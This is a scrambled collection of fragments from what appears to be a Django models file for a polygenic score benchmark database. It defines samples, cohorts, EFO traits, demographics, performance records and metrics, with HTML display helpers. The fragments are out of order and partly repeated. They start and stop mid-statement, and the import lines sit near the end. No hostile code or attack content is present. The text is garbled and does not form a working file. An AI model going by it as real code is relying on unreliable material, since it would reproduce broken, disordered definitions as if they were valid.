queryset", "models.TextField('Additional Ancestry Description', null=True) ## Cohorts/Sources #source_GWAS_catalog = models.CharField('GWAS Catalog Study ID (GCST...)',", "null=True) # Sample sex type information SAMPLE_SEX_CHOICES = [ ('Both', 'Both'), ('Male', 'Male'),", "metric\"\"\" performance = models.ForeignKey(BM_Performance, on_delete=models.CASCADE, verbose_name='PGS Performance Metric (PPM)', related_name=\"performance_metric\") TYPE_CHOICES = [", "= self.phenotype_structured.all() for phenotype in self.phenotype_structured.all(): data.append('<b>'+phenotype.id+'</b>: '+phenotype.label) return data def get_bm_data(self): self.bm_data", "Sample', related_name='sample_performance') # Samples used for evaluation efotrait = models.ForeignKey(BM_EFOTrait, on_delete=models.PROTECT, verbose_name='EFO Trait',", ": {} {}' # Estimate e = '' if self.estimate != None: e", "null=True) ## Description phenotyping_free = models.TextField('Detailed Phenotype Description', null=True) phenotype_structured = models.ManyToManyField(BM_Coding, verbose_name='Codings',", "Deviation', 'sd (cases)': 'Standard Deviation', 'se': 'Standard Error', } if self.variability_type.lower() in desc_list:", "0: l.append(e) # Variability v = None if self.variability != None: type_desc =", "Cases', null=True) sample_controls = models.IntegerField('Number of Controls', null=True) # Sample sex type information", "set of samples\"\"\" # Links to related objects score_id = models.CharField('Polygenic Score (PGS)", "ancestry_additional = models.TextField('Additional Ancestry Description', null=True) ## Cohorts/Sources #source_GWAS_catalog = models.CharField('GWAS Catalog Study", "= f' ({self.sample_cases_percent}%)' sstring += '<div><a class=\"toggle_table_btn pgs_helptip\" id=\"'+div_id+'\" title=\"Click to show/hide the", "self.variability_type.lower() in desc_list: return desc_list[self.variability_type.lower()] class BM_Sample(models.Model): \"\"\"Class to describe samples used in", "## Description phenotyping_free = models.TextField('Detailed Phenotype Description', null=True) phenotype_structured = models.ManyToManyField(BM_Coding, verbose_name='Codings', related_name='coding_sample')", "null=True) #source_PMID = models.CharField('Source PubMed ID (PMID) or doi', max_length=100, null=True) cohort =", "return desc_list[self.variability_type.lower()] class BM_Sample(models.Model): \"\"\"Class to describe samples used in variant associations and", "a PGS and a set of samples\"\"\" # Links to related objects score_id", "len(self.bm_data['scores']) @property def count_cohorts(self): if not hasattr(self, 'bm_data'): self.get_bm_data() return len(self.bm_data['cohorts']) #cohorts =", "the diverse metric data\"\"\" # Using all and filter afterward uses less SQL", "= self.variability_type_desc() if (type_desc): v = helptip.format(type_desc, self.variability_type.title(), self.variability, self.unit) else: v =", "%s'%(self.name, self.name_short, s) else: return '%s: %s'%(self.name, s) def display_value(self): if self.ci !=", "Sample Information ## Numbers sample_number = models.IntegerField('Number of Individuals', validators=[MinValueValidator(1)]) sample_cases = models.IntegerField('Number", "null=True) sample_controls = models.IntegerField('Number of Controls', null=True) # Sample sex type information SAMPLE_SEX_CHOICES", "def sample_cases_percent(self): if self.sample_cases != None: percent = (self.sample_cases / self.sample_number) * 100", "'.join(category_labels) # return categories_data #@property #def display_category_labels(self): # categories = self.category_list # categories_data", "{}'.format(self.estimate, self.ci) else: s = '{}'.format(self.estimate) return s def name_tuple(self): if self.name_short is", "def count_scores(self): if not hasattr(self, 'bm_data'): self.get_bm_data() #scores = set() #for bm_performance in", "e: if self.range != None: type_desc = self.range_type_desc() if (type_desc): r = helptip.format(type_desc,", "('Female', 'Female') ] sample_sex = models.CharField(max_length=6, choices=SAMPLE_SEX_CHOICES, default='Both', verbose_name='Sample Sex' ) sample_age =", "len(category_labels) > 0 else '' # category_labels.append('<div{}><span class=\"trait_colour\" style=\"background-color:{}\"></span>{}</div>'.format(v_spacing,category.colour,category.label)) # categories_data = ''.join(category_labels)", "'{}:{}'.format(self.variability_type, self.variability) return None def format_unit(self): if self.unit != None: return '{}:{}'.format('unit', self.unit)", "# return categories_data class BM_Demographic(models.Model): \"\"\"Class to describe Sample fields (sample_age, followup_time) that", "related_name='coding_sample') followup_time = models.OneToOneField(BM_Demographic, on_delete=models.CASCADE,related_name='followuptime_of', null=True) ## Ancestry ancestry_broad = models.CharField('Broad Ancestry Category',", "self.ancestry_broad else: return '{}<br/>({})'.format(self.ancestry_broad, self.ancestry_free) @property def display_ancestry_inline(self): if self.ancestry_free in ['NR', '',", "return '{}:{}'.format(self.estimate_type, self.estimate) return None def format_range(self): if self.estimate == None and self.range", "'<a href=\"../../benchmark/%s\">%s</a>'%(self.id, self.label) #@property #def display_id_url(self): # return '<a href=\"%s\">%s</a><span class=\"only_export\">: %s</span>'%(self.url, self.id,", "= models.FloatField(verbose_name='Estimate', null=False) unit = models.TextField(verbose_name='Units of the effect size', max_length=100, blank =", "self.variability # Unit if self.unit != None: l['unit'] = self.unit return l def", "[] if effect_sizes_list: for effect_size in self.effect_sizes_list: effect_sizes_data.append({'labels': effect_size[0], 'value': effect_size[1]}) perf_metrics['effect_sizes'] =", "in PGS \"\"\" id = models.CharField('Code ID', max_length=30, primary_key=True) label = models.CharField('Code Label',", "scores.add(bm_performance.score_id) return len(self.bm_data['scores']) @property def count_cohorts(self): if not hasattr(self, 'bm_data'): self.get_bm_data() return len(self.bm_data['cohorts'])", "name_short = models.CharField(verbose_name='Performance Metric Name (Short)', max_length=25, null=True) # ex: \"OR\" estimate =", "def name_tuple(self): if self.name_short is None: return (self.name, self.name) else: return (self.name, self.name_short)", "null=True) estimate_type = models.CharField(verbose_name='Estimate (type)', max_length=100, null=True, default='mean') #e.g. [mean, median] unit =", "data.append('<b>'+phenotype.id+'</b>: '+phenotype.label) return data def get_bm_data(self): self.bm_data = {} data_types = ['scores', 'cohorts',", "%s</span>'%(self.url, self.id, self.url) @property def display_phenotype_structured(self): data = [] phenotype_structured = self.phenotype_structured.all() for", "self.efotrait_performance.all(): #print(str(bm_performance)) data['scores'].add(bm_performance.score_id) data['cohorts'].add(bm_performance.cohort) data['samples'].add(bm_performance.sample.id) data['ancestries'].add(bm_performance.sample.ancestry_broad) for type in data_types: #print(type+\": \"+str(list(data_count[type]))) self.bm_data[type]", "] sample_sex = models.CharField(max_length=6, choices=SAMPLE_SEX_CHOICES, default='Both', verbose_name='Sample Sex' ) sample_age = models.OneToOneField(BM_Demographic, on_delete=models.CASCADE,related_name='ages_of',", "@property def othermetrics_list(self): return self.get_metric_data('Other Metric') @property def performance_metrics(self): perf_metrics = {} effect_sizes_list", "{ 'ci': 'Confidence interval', 'iqr': 'Interquartile range' } if self.range_type.lower() in desc_list: return", "len(e) > 0: l.append(e) # Variability v = None if self.variability != None:", "@property def display_ancestry(self): if self.ancestry_free in ['NR', '', None]: return self.ancestry_broad else: return", "# Samples used for evaluation efotrait = models.ForeignKey(BM_EFOTrait, on_delete=models.PROTECT, verbose_name='EFO Trait', related_name=\"efotrait_performance\") cohort", "!= None: e += '{} : {}'.format(self.estimate_type.title(), self.estimate) if self.range != None and", "null=True) ancestry_additional = models.TextField('Additional Ancestry Description', null=True) ## Cohorts/Sources #source_GWAS_catalog = models.CharField('GWAS Catalog", "= '{} {}'.format(self.estimate, self.ci) else: s = '{}'.format(self.estimate) return s def name_tuple(self): if", "verbose_name='PGS Sample', related_name='sample_performance') # Samples used for evaluation efotrait = models.ForeignKey(BM_EFOTrait, on_delete=models.PROTECT, verbose_name='EFO", "= '{} {}'.format(self.estimate, self.ci) else: s = '{}'.format(self.estimate) if (self.name_short): return '%s (%s):", "[] #@property #def category_labels(self): # category_labels = self.category_labels_list # categories_data = '' #", "None: return '{}:{}'.format(self.estimate_type, self.estimate) return None def format_range(self): if self.estimate == None and", "l.append(e) # Variability v = None if self.variability != None: type_desc = self.variability_type_desc()", "{} {}' no_helptip = '{} : {} {}' # Estimate e = ''", "= '' if self.estimate != None: estimate = str(self.estimate) if self.range != None", "type = models.CharField(max_length=40, choices=TYPE_CHOICES, default='Other Metric', db_index=True ) name = models.CharField(verbose_name='Performance Metric Name',", "= ['scores', 'cohorts', 'samples', 'ancestries'] data = {} for type in data_types: data[type]", "return self.bm_data['ancestries'] #@property #def synonyms_list(self): # if self.synonyms: # return self.synonyms.split(' | ')", "if v != None: l.append(v) # Range r = None if '[' not", "= [] if class_acc_list: for class_acc in self.class_acc_list: class_acc_data.append({'labels': class_acc[0], 'value': class_acc[1]}) perf_metrics['class_acc']", "= ' class=\"mt-1\"' if len(category_labels) > 0 else '' # category_labels.append('<div{}><span class=\"trait_colour\" style=\"background-color:{}\"></span>{}</div>'.format(v_spacing,category.colour,category.label))", "} if self.range_type.lower() in desc_list: return desc_list[self.range_type.lower()] def variability_type_desc(self): desc_list = { 'sd':", "if self.range != None and self.range_type.lower() == 'ci': e += ' {}'.format(str(self.range)) e", "in estimate: l[self.range_type] = str(self.range) # Variability if self.variability != None: l[self.variability_type] =", "queryset metrics = self.performance_metric.all() if metrics: l = [] for m in metrics:", "> 0: # category_labels = [] # for category in categories: # v_spacing", "Generic method to extract and format the diverse metric data\"\"\" # Using all", "effect_sizes_list = self.effect_sizes_list effect_sizes_data = [] if effect_sizes_list: for effect_size in self.effect_sizes_list: effect_sizes_data.append({'labels':", "Range if self.range != None and '[' not in estimate: l[self.range_type] = str(self.range)", "Classification of Diseases used in PGS \"\"\" id = models.CharField('Code ID', max_length=30, primary_key=True)", "# ex: \"OR\" estimate = models.FloatField(verbose_name='Estimate', null=False) unit = models.TextField(verbose_name='Units of the effect", "return len(self.bm_data['cohorts']) #cohorts = set() #for bm_performance in BM_Performance.objects.using(\"benchmark\").filter(efotrait=self).order_by('id'): # cohorts.add(bm_performance.cohort.id) #return len(list(cohorts))", "data = [] phenotype_structured = self.phenotype_structured.all() for phenotype in self.phenotype_structured.all(): data.append('<b>'+phenotype.id+'</b>: '+phenotype.label) return", "class=\"only_export\">, </span>' sstring += '{:,} controls</li>'.format(self.sample_controls) sstring += '</ul>' sstring += '<span class=\"only_export\">]</span>'", "in samples\"\"\" name_short = models.CharField('Cohort Short Name', max_length=100, db_index=True) name_full = models.CharField('Cohort Full", "class BM_Performance(models.Model): \"\"\"Class to hold performance/accuracy metrics for a PGS and a set", "(value)', null=True) variability_type = models.CharField(verbose_name='Range (type)', max_length=100, default='se') # e.g. standard deviation (sd),", "def display_ancestry_inline(self): if self.ancestry_free in ['NR', '', None]: return self.ancestry_broad else: return '{}", "e += ' {}'.format(self.unit) if len(e) > 0: l.append(e) # Variability v =", "Ancestry ancestry_broad = models.CharField('Broad Ancestry Category', max_length=100) ancestry_free = models.TextField('Ancestry (e.g. French, Chinese)',", "Full Name', max_length=1000) def __str__(self): return self.name_short class BM_EFOTrait(models.Model): \"\"\"Abstract class to hold", "of Individuals', validators=[MinValueValidator(1)]) sample_cases = models.IntegerField('Number of Cases', null=True) sample_controls = models.IntegerField('Number of", "self.range != None and '[' not in estimate: l[self.range_type] = str(self.range) # Variability", "BM_Metric(models.Model): \"\"\"Class to hold metric type, name, value and confidence intervals of a", "# if len(category_labels) > 0: # categories_data = ', '.join(category_labels) # return categories_data", "'{}:{}'.format(self.estimate_type, self.estimate) return None def format_range(self): if self.estimate == None and self.range !=", "get_bm_data(self): self.bm_data = {} data_types = ['scores', 'cohorts', 'samples', 'ancestries'] data = {}", "= effect_sizes_data class_acc_list = self.class_acc_list class_acc_data = [] if class_acc_list: for class_acc in", "helptip = '<span title=\"{}\" class=\"pgs_helptip\">{}</span> : {} {}' no_helptip = '{} : {}", "None: e += '{} : {}'.format(self.estimate_type.title(), self.estimate) if self.range != None and self.range_type.lower()", "> 0 else '' # category_labels.append('<div{}><span class=\"trait_colour\" style=\"background-color:{}\"></span>{}</div>'.format(v_spacing,category.colour,category.label)) # categories_data = ''.join(category_labels) #", "max_length=100, null=False, default='years') # e.g. [years, months, days] range = DecimalRangeField(verbose_name='Range (values)', null=True)", "categories_data = ''.join(category_labels) # return categories_data class BM_Demographic(models.Model): \"\"\"Class to describe Sample fields", "x in categories] # else: # return [] #@property #def category_labels(self): # category_labels", "mapped_terms_list(self): # if self.mapped_terms: # return self.mapped_terms.split(' | ') # else: # return", "+= '<li><span class=\"only_export\">, </span>' sstring += '{:,} controls</li>'.format(self.sample_controls) sstring += '</ul>' sstring +=", "'<ul>\\n<li>{:,} cases{}</li>\\n'.format(self.sample_cases, percent_cases) if self.sample_controls != None: sstring += '<li><span class=\"only_export\">, </span>' sstring", "('OM', 'Other Metric') ] type = models.CharField(max_length=40, choices=TYPE_CHOICES, default='Other Metric', db_index=True ) name", "self.phenotype_structured.all() for phenotype in self.phenotype_structured.all(): data.append('<b>'+phenotype.id+'</b>: '+phenotype.label) return data def get_bm_data(self): self.bm_data =", "categories = self.category_list # if len(categories) > 0: # return [x.label for x", "TYPE_CHOICES = [ ('ES', 'Effect Size'), ('CM', 'Classification Metric'), ('OM', 'Other Metric') ]", "Description', null=True) ## Cohorts/Sources #source_GWAS_catalog = models.CharField('GWAS Catalog Study ID (GCST...)', max_length=20, null=True)", "categories] # else: # return [] #@property #def category_list(self): # return sorted(self.traitcategory.all(), key=lambda", "afterward uses less SQL queries than filtering directly on the queryset metrics =", "None: return '{}:{}'.format('unit', self.unit) return None def display_value(self): l = [] helptip =", "@property def cohorts_list(self): if not hasattr(self, 'bm_data'): self.get_bm_data() return self.bm_data['cohorts'] @property def ancestries_list(self):", "models.CharField('Source PubMed ID (PMID) or doi', max_length=100, null=True) cohort = models.ForeignKey(BM_Cohort, verbose_name='Cohort', on_delete=models.PROTECT,", "class=\"only_export\">]</span>' sstring += '</div>' else: sstring += '{:,} individuals'.format(self.sample_number) return sstring @property def", "None def format_variability(self): if self.variability != None: return '{}:{}'.format(self.variability_type, self.variability) return None def", "db_index=True) description = models.TextField('Ontology Trait Description', null=True) #url = models.CharField('Ontology URL', max_length=500) #synonyms", "if self.sample_controls != None: sstring += '<li><span class=\"only_export\">, </span>' sstring += '{:,} controls</li>'.format(self.sample_controls)", "can be point estimates or distributions\"\"\" estimate = models.FloatField(verbose_name='Estimate (value)', null=True) estimate_type =", "id=\"list_'+div_id+'\">' sstring += '<span class=\"only_export\">[</span>' sstring += '<ul>\\n<li>{:,} cases{}</li>\\n'.format(self.sample_cases, percent_cases) if self.sample_controls !=", "'{}<br/>({})'.format(self.ancestry_broad, self.ancestry_free) @property def display_ancestry_inline(self): if self.ancestry_free in ['NR', '', None]: return self.ancestry_broad", "not hasattr(self, 'bm_data'): self.get_bm_data() return self.bm_data['cohorts'] @property def ancestries_list(self): if not hasattr(self, 'bm_data'):", "hold metric type, name, value and confidence intervals of a performance metric\"\"\" performance", "l.append(v) # Range r = None if '[' not in e: if self.range", "diverse metric data\"\"\" # Using all and filter afterward uses less SQL queries", "if class_acc_list: for class_acc in self.class_acc_list: class_acc_data.append({'labels': class_acc[0], 'value': class_acc[1]}) perf_metrics['class_acc'] = class_acc_data", "= estimate # Range if self.range != None and '[' not in estimate:", "Description', null=True) phenotype_structured = models.ManyToManyField(BM_Coding, verbose_name='Codings', related_name='coding_sample') followup_time = models.OneToOneField(BM_Demographic, on_delete=models.CASCADE,related_name='followuptime_of', null=True) ##", "category_labels.append('<div{}><span class=\"trait_colour\" style=\"background-color:{}\"></span>{}</div>'.format(v_spacing,category.colour,category.label)) # categories_data = ''.join(category_labels) # return categories_data class BM_Demographic(models.Model): \"\"\"Class", "controlled trait vocabulary (mainly to link multiple EFO to a single score)\"\"\" id", "estimate: l[self.estimate_type] = estimate # Range if self.range != None and '[' not", "Variability if self.variability != None: l[self.variability_type] = self.variability # Unit if self.unit !=", "django.conf import settings from django.core.validators import MaxValueValidator, MinValueValidator from django.contrib.postgres.fields import DecimalRangeField class", "effect_sizes_data = [] if effect_sizes_list: for effect_size in self.effect_sizes_list: effect_sizes_data.append({'labels': effect_size[0], 'value': effect_size[1]})", "\"\"\"Class to hold performance/accuracy metrics for a PGS and a set of samples\"\"\"", "effect_sizes_list: for effect_size in self.effect_sizes_list: effect_sizes_data.append({'labels': effect_size[0], 'value': effect_size[1]}) perf_metrics['effect_sizes'] = effect_sizes_data class_acc_list", "othermetrics_data return perf_metrics def get_metric_data(self, metric_type): \"\"\" Generic method to extract and format", "sstring += '{:,} controls</li>'.format(self.sample_controls) sstring += '</ul>' sstring += '<span class=\"only_export\">]</span>' sstring +=", "Label', max_length=500, db_index=True) description = models.TextField('Ontology Trait Description', null=True) #url = models.CharField('Ontology URL',", "!= None: percent = (self.sample_cases / self.sample_number) * 100 return round(percent,2) else: return", "= models.TextField('Mapped terms', null=True) phenotype_structured = models.ManyToManyField(BM_Coding, verbose_name='Codings', related_name='coding_trait') def __str__(self): return '%s", "return l def range_type_desc(self): desc_list = { 'ci': 'Confidence interval', 'iqr': 'Interquartile range'", "!= None: l['unit'] = self.unit return l def range_type_desc(self): desc_list = { 'ci':", "import settings from django.core.validators import MaxValueValidator, MinValueValidator from django.contrib.postgres.fields import DecimalRangeField class BM_Coding(models.Model):", "models.FloatField(verbose_name='Estimate', null=False) unit = models.TextField(verbose_name='Units of the effect size', max_length=100, blank = False)", "len(categories) > 0: # return [x.label for x in categories] # else: #", "from django.core.validators import MaxValueValidator, MinValueValidator from django.contrib.postgres.fields import DecimalRangeField class BM_Coding(models.Model): \"\"\"Class to", "#def mapped_terms_list(self): # if self.mapped_terms: # return self.mapped_terms.split(' | ') # else: #", "BM_Coding(models.Model): \"\"\"Class to describe the International Classification of Diseases used in PGS \"\"\"", "if not hasattr(self, 'bm_data'): self.get_bm_data() return self.bm_data['cohorts'] @property def ancestries_list(self): if not hasattr(self,", "0: # return [x.label for x in categories] # else: # return []", "in self.class_acc_list: class_acc_data.append({'labels': class_acc[0], 'value': class_acc[1]}) perf_metrics['class_acc'] = class_acc_data othermetrics_list = self.othermetrics_list othermetrics_data", "on_delete=models.PROTECT, verbose_name='PGS Sample', related_name='sample_performance') # Samples used for evaluation efotrait = models.ForeignKey(BM_EFOTrait, on_delete=models.PROTECT,", "in self.phenotype_structured.all(): data.append('<b>'+phenotype.id+'</b>: '+phenotype.label) return data def get_bm_data(self): self.bm_data = {} data_types =", "href=\"../../benchmark/%s\">%s</a>'%(self.id, self.label) #@property #def display_id_url(self): # return '<a href=\"%s\">%s</a><span class=\"only_export\">: %s</span>'%(self.url, self.id, self.url)", "# v_spacing = ' class=\"mt-1\"' if len(category_labels) > 0 else '' # category_labels.append('<div{}><span", "percent_cases) if self.sample_controls != None: sstring += '<li><span class=\"only_export\">, </span>' sstring += '{:,}", "'%(self.id, self.label) @property def display_label(self): return '<a href=\"../../benchmark/%s\">%s</a>'%(self.id, self.label) #@property #def display_id_url(self): #", "(values)', null=True) range_type = models.CharField(verbose_name='Range (type)', max_length=100, default='range') # e.g. Confidence interval (ci),", "bm_performance in BM_Performance.objects.using(\"benchmark\").filter(efotrait=self).order_by('id'): # cohorts.add(bm_performance.cohort.id) #return len(list(cohorts)) @property def count_samples(self): if not hasattr(self,", "+= '<span class=\"only_export\">[</span>' sstring += '<ul>\\n<li>{:,} cases{}</li>\\n'.format(self.sample_cases, percent_cases) if self.sample_controls != None: sstring", "self.get_bm_data() #scores = set() #for bm_performance in BM_Performance.objects.using(\"benchmark\").filter(efotrait=self).order_by('id'): # scores.add(bm_performance.score_id) return len(self.bm_data['scores']) @property", "models.CharField(verbose_name='Range (type)', max_length=100, default='se') # e.g. standard deviation (sd), standard error (se) def", "= set() #for bm_performance in BM_Performance.objects.using(\"benchmark\").filter(efotrait=self).order_by('id'): # scores.add(bm_performance.score_id) return len(self.bm_data['scores']) @property def count_cohorts(self):", "!= None: return '{}:{}'.format(self.range_type, str(self.range)) return None def format_variability(self): if self.variability != None:", "ID', max_length=30, primary_key=True) label = models.CharField('Code Label', max_length=500, db_index=True) type = models.CharField('Code Type',", "Ancestry Category', max_length=100) ancestry_free = models.TextField('Ancestry (e.g. French, Chinese)', null=True) ancestry_country = models.TextField('Country", "related_name=\"performance_metric\") TYPE_CHOICES = [ ('ES', 'Effect Size'), ('CM', 'Classification Metric'), ('OM', 'Other Metric')", "sstring += '<span class=\"only_export\">[</span>' sstring += '<ul>\\n<li>{:,} cases{}</li>\\n'.format(self.sample_cases, percent_cases) if self.sample_controls != None:", "'value': effect_size[1]}) perf_metrics['effect_sizes'] = effect_sizes_data class_acc_list = self.class_acc_list class_acc_data = [] if class_acc_list:", "'' if self.sample_cases != None: percent_cases = '' if show_percent_cases: percent_cases = f'", "range' } if self.range_type.lower() in desc_list: return desc_list[self.range_type.lower()] def variability_type_desc(self): desc_list = {", "@property def display_ancestry_inline(self): if self.ancestry_free in ['NR', '', None]: return self.ancestry_broad else: return", "@property def count_scores(self): if not hasattr(self, 'bm_data'): self.get_bm_data() #scores = set() #for bm_performance", "self.name_short class BM_EFOTrait(models.Model): \"\"\"Abstract class to hold information related to controlled trait vocabulary", "objects score_id = models.CharField('Polygenic Score (PGS) ID', max_length=30, db_index=True) sample = models.ForeignKey(BM_Sample, on_delete=models.PROTECT,", "m in metrics: if (m.type == metric_type): l.append((m.name_tuple(), m.display_value())) if len(l) != 0:", "data['scores'].add(bm_performance.score_id) data['cohorts'].add(bm_performance.cohort) data['samples'].add(bm_performance.sample.id) data['ancestries'].add(bm_performance.sample.ancestry_broad) for type in data_types: #print(type+\": \"+str(list(data_count[type]))) self.bm_data[type] = list(data[type])", "in categories: # v_spacing = ' class=\"mt-1\"' if len(category_labels) > 0 else ''", "= models.TextField('Additional Ancestry Description', null=True) ## Cohorts/Sources #source_GWAS_catalog = models.CharField('GWAS Catalog Study ID", "extract and format the diverse metric data\"\"\" # Using all and filter afterward", "Metric') @property def performance_metrics(self): perf_metrics = {} effect_sizes_list = self.effect_sizes_list effect_sizes_data = []", "standard error (se) def format_estimate(self): if self.estimate != None: return '{}:{}'.format(self.estimate_type, self.estimate) return", "= DecimalRangeField(verbose_name='Range (values)', null=True) range_type = models.CharField(verbose_name='Range (type)', max_length=100, default='range') # e.g. Confidence", "#def synonyms_list(self): # if self.synonyms: # return self.synonyms.split(' | ') # else: #", "def display_samples_for_table(self, show_percent_cases=False): div_id = \"sample_\"+str(self.pk) sstring = '' if self.sample_cases != None:", "to extract and format the diverse metric data\"\"\" # Using all and filter", "return '%s (%s): %s'%(self.name, self.name_short, s) else: return '%s: %s'%(self.name, s) def display_value(self):", "class=\"mt-1\"' if len(category_labels) > 0 else '' # category_labels.append('<div{}><span class=\"trait_colour\" style=\"background-color:{}\"></span>{}</div>'.format(v_spacing,category.colour,category.label)) # categories_data", "s) else: return '%s: %s'%(self.name, s) def display_value(self): if self.ci != None: s", "', '.join(category_labels) # return categories_data #@property #def display_category_labels(self): # categories = self.category_list #", "\"Odds Ratio\" name_short = models.CharField(verbose_name='Performance Metric Name (Short)', max_length=25, null=True) # ex: \"OR\"", "#@property #def synonyms_list(self): # if self.synonyms: # return self.synonyms.split(' | ') # else:", "Name', max_length=100, db_index=True) name_full = models.CharField('Cohort Full Name', max_length=1000) def __str__(self): return self.name_short", "round(percent,2) else: return None def display_samples_for_table(self, show_percent_cases=False): div_id = \"sample_\"+str(self.pk) sstring = ''", "in ['NR', '', None]: return self.ancestry_broad else: return '{} ({})'.format(self.ancestry_broad, self.ancestry_free) class BM_Performance(models.Model):", "!= 0: return l return None class BM_Metric(models.Model): \"\"\"Class to hold metric type,", "href=\"%s\">%s</a><span class=\"only_export\">: %s</span>'%(self.url, self.id, self.url) @property def display_phenotype_structured(self): data = [] phenotype_structured =", "#print(type+\": \"+str(list(data_count[type]))) self.bm_data[type] = list(data[type]) @property def count_scores(self): if not hasattr(self, 'bm_data'): self.get_bm_data()", "BM_Performance.objects.using(\"benchmark\").filter(efotrait=self).order_by('id'): # cohorts.add(bm_performance.cohort.id) #return len(list(cohorts)) @property def count_samples(self): if not hasattr(self, 'bm_data'): self.get_bm_data()", "return '{}:{}'.format(self.variability_type, self.variability) return None def format_unit(self): if self.unit != None: return '{}:{}'.format('unit',", "l return None class BM_Metric(models.Model): \"\"\"Class to hold metric type, name, value and", "self.class_acc_list: class_acc_data.append({'labels': class_acc[0], 'value': class_acc[1]}) perf_metrics['class_acc'] = class_acc_data othermetrics_list = self.othermetrics_list othermetrics_data =", "django.core.validators import MaxValueValidator, MinValueValidator from django.contrib.postgres.fields import DecimalRangeField class BM_Coding(models.Model): \"\"\"Class to describe", "(sd), standard error (se) def format_estimate(self): if self.estimate != None: return '{}:{}'.format(self.estimate_type, self.estimate)", "def cohorts_list(self): if not hasattr(self, 'bm_data'): self.get_bm_data() return self.bm_data['cohorts'] @property def ancestries_list(self): if", "models.ForeignKey(BM_Cohort, verbose_name='Cohort', on_delete=models.PROTECT, related_name='cohort_performance') def __str__(self): return '%s | %s | %s'%(self.efotrait.id, self.score_id,", "+= '{:,} controls</li>'.format(self.sample_controls) sstring += '</ul>' sstring += '<span class=\"only_export\">]</span>' sstring += '</div>'", "hold information related to controlled trait vocabulary (mainly to link multiple EFO to", "efotrait = models.ForeignKey(BM_EFOTrait, on_delete=models.PROTECT, verbose_name='EFO Trait', related_name=\"efotrait_performance\") cohort = models.ForeignKey(BM_Cohort, verbose_name='Cohort', on_delete=models.PROTECT, related_name='cohort_performance')", "null=True) # ex: \"OR\" estimate = models.FloatField(verbose_name='Estimate', null=False) unit = models.TextField(verbose_name='Units of the", "self.cohort.name_short) class Meta: get_latest_by = 'num' @property def effect_sizes_list(self): return self.get_metric_data('Effect Size') @property", "= no_helptip.format(self.variability_type.title(), self.variability, self.unit) if v != None: l.append(v) # Range r =", "return '<ul><li>'+'</li><li>'.join(l)+'</li></ul>' else: return '' def display_values_dict(self): l = {} # Estimate estimate", "interval', 'iqr': 'Interquartile range' } if self.range_type.lower() in desc_list: return desc_list[self.range_type.lower()] def variability_type_desc(self):", "{}'.format(self.unit) if len(e) > 0: l.append(e) # Variability v = None if self.variability", "# return [] #@property #def category_list(self): # return sorted(self.traitcategory.all(), key=lambda y: y.label) #@property", "cohort = models.ForeignKey(BM_Cohort, verbose_name='Cohort', on_delete=models.PROTECT, related_name='cohort_sample') #cohorts_additional = models.TextField('Additional Sample/Cohort Information', null=True) def", "category_labels = [] # for category in categories: # v_spacing = ' class=\"mt-1\"'", "'%s: %s'%(self.name, s) def display_value(self): if self.ci != None: s = '{} {}'.format(self.estimate,", "'Both'), ('Male', 'Male'), ('Female', 'Female') ] sample_sex = models.CharField(max_length=6, choices=SAMPLE_SEX_CHOICES, default='Both', verbose_name='Sample Sex'", "models.TextField(verbose_name='Units of the effect size', max_length=100, blank = False) ci = DecimalRangeField(verbose_name='95% Confidence", "models.CharField(max_length=6, choices=SAMPLE_SEX_CHOICES, default='Both', verbose_name='Sample Sex' ) sample_age = models.OneToOneField(BM_Demographic, on_delete=models.CASCADE,related_name='ages_of', null=True) ## Description", "desc_list = { 'ci': 'Confidence interval', 'iqr': 'Interquartile range' } if self.range_type.lower() in", "if self.unit != None: return '{}:{}'.format('unit', self.unit) return None def display_value(self): l =", "= set() #for bm_performance in BM_Performance.objects.using(\"benchmark\").filter(efotrait=self).order_by('id'): for bm_performance in self.efotrait_performance.all(): #print(str(bm_performance)) data['scores'].add(bm_performance.score_id) data['cohorts'].add(bm_performance.cohort)", "ancestries_list(self): if not hasattr(self, 'bm_data'): self.get_bm_data() return self.bm_data['ancestries'] #@property #def synonyms_list(self): # if", "set() #for bm_performance in BM_Performance.objects.using(\"benchmark\").filter(efotrait=self).order_by('id'): # scores.add(bm_performance.score_id) return len(self.bm_data['scores']) @property def count_cohorts(self): if", "verbose_name='Sample Sex' ) sample_age = models.OneToOneField(BM_Demographic, on_delete=models.CASCADE,related_name='ages_of', null=True) ## Description phenotyping_free = models.TextField('Detailed", "# cohorts.add(bm_performance.cohort.id) #return len(list(cohorts)) @property def count_samples(self): if not hasattr(self, 'bm_data'): self.get_bm_data() return", "if self.variability != None: type_desc = self.variability_type_desc() if (type_desc): v = helptip.format(type_desc, self.variability_type.title(),", "null=False, default='years') # e.g. [years, months, days] range = DecimalRangeField(verbose_name='Range (values)', null=True) range_type", "Numbers sample_number = models.IntegerField('Number of Individuals', validators=[MinValueValidator(1)]) sample_cases = models.IntegerField('Number of Cases', null=True)", "DecimalRangeField class BM_Coding(models.Model): \"\"\"Class to describe the International Classification of Diseases used in", "+= ' {}'.format(str(self.range)) e += ' {}'.format(self.unit) if len(e) > 0: l.append(e) #", "!= None: l[self.variability_type] = self.variability # Unit if self.unit != None: l['unit'] =", "Name (Short)', max_length=25, null=True) # ex: \"OR\" estimate = models.FloatField(verbose_name='Estimate', null=False) unit =", "l.append(r) if (len(l) == 1): return l[0] elif (len(l) > 1): return '<ul><li>'+'</li><li>'.join(l)+'</li></ul>'", "# if len(categories) > 0: # category_labels = [] # for category in", "# category_labels.append('<div{}><span class=\"trait_colour\" style=\"background-color:{}\"></span>{}</div>'.format(v_spacing,category.colour,category.label)) # categories_data = ''.join(category_labels) # return categories_data class BM_Demographic(models.Model):", "== metric_type): l.append((m.name_tuple(), m.display_value())) if len(l) != 0: return l return None class", "'value': othermetrics[1]}) perf_metrics['othermetrics'] = othermetrics_data return perf_metrics def get_metric_data(self, metric_type): \"\"\" Generic method", "r = None if '[' not in e: if self.range != None: type_desc", "= models.FloatField(verbose_name='Estimate (value)', null=True) estimate_type = models.CharField(verbose_name='Estimate (type)', max_length=100, null=True, default='mean') #e.g. [mean,", "= models.CharField('Ontology Trait Label', max_length=500, db_index=True) description = models.TextField('Ontology Trait Description', null=True) #url", "# Estimate estimate = '' if self.estimate != None: estimate = str(self.estimate) if", "\"\"\"Class to describe the International Classification of Diseases used in PGS \"\"\" id", "Metric'), ('OM', 'Other Metric') ] type = models.CharField(max_length=40, choices=TYPE_CHOICES, default='Other Metric', db_index=True )", "@property def class_acc_list(self): return self.get_metric_data('Classification Metric') @property def othermetrics_list(self): return self.get_metric_data('Other Metric') @property", "= models.OneToOneField(BM_Demographic, on_delete=models.CASCADE,related_name='ages_of', null=True) ## Description phenotyping_free = models.TextField('Detailed Phenotype 